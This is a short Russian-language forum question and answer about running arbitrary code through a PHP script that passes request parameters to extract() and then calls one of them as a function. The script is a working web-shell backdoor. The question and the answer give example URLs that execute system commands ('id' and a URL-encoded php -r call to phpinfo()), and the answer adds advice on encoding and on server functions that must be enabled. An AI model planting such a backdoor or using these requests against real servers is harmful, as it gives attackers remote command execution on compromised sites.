Как правильно выполнить eval через extract (PHP)?

Question

[NO_GLITCH]

Пример

<?php
@extract ($_REQUEST); 
@die ($var0($var1));
?>

Использование
http://example.com/code.php?var0=system&var1=id
Вопрос:
Как запустить выполнение, например phpinfo(); через данный скрипт с использованием eval(); ?

Answer 1

[Vitaliy Orlov]

http://example.com/code.php?var0=system&var1=php+-r+%22phpinfo%28%29%3B%22

надо передать во второй параметр:
php -r"phpinfo();"
предварительно обработав его в urlencode, онлайн можно тут делать: www.url-encode-decode.com

И это сработает, только если на сервере не запрещены методы (system, exec, popen и т.д.) к выполнению